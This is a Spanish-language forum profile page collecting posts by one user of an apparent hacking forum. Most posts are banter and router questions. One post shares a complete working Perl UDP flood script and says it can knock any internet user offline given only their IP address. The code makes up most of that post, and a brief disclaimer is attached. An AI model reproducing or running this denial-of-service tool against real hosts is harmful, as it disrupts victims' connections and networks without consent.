Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - [M4rtin]

#1
porque esperar tanto , agrega al facebook te mando un mensaje privado vale
#2
no trato de hackear solamente aqui comparto esta informacion ha quien le sirva pz que le sirva , le digo esto porque un amigo de "madrid me realizo un ataque desde aya aqui en peru" andaba en linux y logro dejarme sin linea ," , pensaba que hera botnet con mas de 5.000 infectados y hera solo eso jajaj bueno saludos bro seguire posteando mas cosas interesante , mientras ando aprendiendo linux
#3
no me interesa los metadatos , creados por otros "chema alonso" , yo me dedico a lo mio , "ahora me llamas lammer ,no tiro web , ya que no me gusta usas botnets y instalarlo en mi hosting de paga , y ponerme a infectar como loco

2.- Si necesitas algun problema dimelo en privado :D

se nota que eres uno de esos habladores ... decime que sabes para taparte la boca  :-X
#4
hay esta su pagina oficial men , porque no te tomas tu tiempo en leer y luego hablas ,esto funciona saludos y sige aprendiendo  ;D
#5
Bugs y Exploits / script perl "Al descubierto"
15 Julio 2012, 21:23 PM
Hola a todos comparto este script source en perl , solo para aquellas personas que saben script y algo de perl si lo logran hacerlo bien , podran tumbar cualquier usuario en internet , tan solo con su ip

bueno comencemos :d

Claro necesitan tener instalado perl

URL Oficial http://wiki.nil.com/UDP_flood_in_Perl

imagenes de prueba :



POSTDATA: No soy responsable con el uso , solo comparto como muchos lo hacen saludos y espero que lo hagan para labs pruebas saludos...

codigo del source para los que no veen y esten preguntando cosas de gays jaja como no me funciona jaja bueno ya les dije arriba para los que saben perl se les hara muy facil

no soy la persona que  gusta dar todo masticado ...

#!/usr/bin/perl
#####################################################
# udp flood.
######################################################

use Socket;
use strict;
use Getopt::Long;
use Time::HiRes qw( usleep gettimeofday ) ;

our $port = 0;
our $size = 0;
our $time = 0;
our $bw   = 0;
our $help = 0;
our $delay= 0;

GetOptions(
"port=i" => \$port, # UDP port to use, numeric, 0=random
"size=i" => \$size, # packet size, number, 0=random
"bandwidth=i" => \$bw, # bandwidth to consume
"time=i" => \$time, # time to run
"delay=f"=> \$delay, # inter-packet delay
"help|?" => \$help); # help


my ($ip) = @ARGV;

if ($help || !$ip) {
  print <<'EOL';
flood.pl --port=dst-port --size=pkt-size --time=secs
         --bandwidth=kbps --delay=msec ip-address

Defaults:
  * random destination UDP ports are used unless --port is specified
  * random-sized packets are sent unless --size or --bandwidth is specified
  * flood is continuous unless --time is specified
  * flood is sent at line speed unless --bandwidth or --delay is specified

Usage guidelines:
  --size parameter is ignored if both the --bandwidth and the --delay
    parameters are specified.

  Packet size is set to 256 bytes if the --bandwidth parameter is used
    without the --size parameter

  The specified packet size is the size of the IP datagram (including IP and
  UDP headers). Interface packet sizes might vary due to layer-2 encapsulation.

Warnings and Disclaimers:
  Flooding third-party hosts or networks is commonly considered a criminal activity.
  Flooding your own hosts or networks is usually a bad idea
  Higher-performace flooding solutions should be used for stress/performance tests
  Use primarily in lab environments for QoS tests
EOL
  exit(1);
}

if ($bw && $delay) {
  print "WARNING: computed packet size overwrites the --size parameter ignored\n";
  $size = int($bw * $delay / 8);
} elsif ($bw) {
  $delay = (8 * $size) / $bw;
}

$size = 256 if $bw && !$size;

($bw = int($size / $delay * 8)) if ($delay && $size);

my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);
socket(flood, PF_INET, SOCK_DGRAM, 17);

print "Flooding $ip " . ($port ? $port : "random") . " port with " .
  ($size ? "$size-byte" : "random size") . " packets" . ($time ? " for $time seconds" : "") . "\n";
print "Interpacket delay $delay msec\n" if $delay;
print "total IP bandwidth $bw kbps\n" if $bw;
print "Break with Ctrl-C\n" unless $time;

die "Invalid packet size requested: $size\n" if $size && ($size < 64 || $size > 1500);
$size -= 28 if $size;
for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1024-64)+64) ;
  $pport = $port ? $port : int(rand(65500))+1;

  send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));
  usleep(1000 * $delay) if $delay;
}


saludos



#6
haha , para serles sinceros a mi no me gusta los juegos xddd
#7
Redes / Re: duda , repeater ap
24 Junio 2012, 01:40 AM
"hi la opcion " brige too point" ? para que sirve  :o
#8
Redes / duda , repeater ap
16 Junio 2012, 03:55 AM
hola a todos tengo la siguiente duda  :rolleyes: , tengo un acces point modelo TL-WA500G

se algunas opciones para que sirven pero yo queria preguntar para que sirve esta 2 dichas opciones



#9
bueno comparto mi conocimiento , solo dije que sirve en PERU , no he probado en otros paises

2.- Hize el post para Peru

3.- Aquellas personas que dicen que no se pueden hacer nada , pz porque han cambiado la clave del router que se yo

4.- Fin  ;D
#10
Hacking Wireless / Re: me roban internet
17 Mayo 2012, 02:27 AM
si tienen muchas razones mis compañeros , pero si te he cambiado la clave del router U.u hay si no puedes hacer nada , mas que solo reiniciar el router saludos :rolleyes: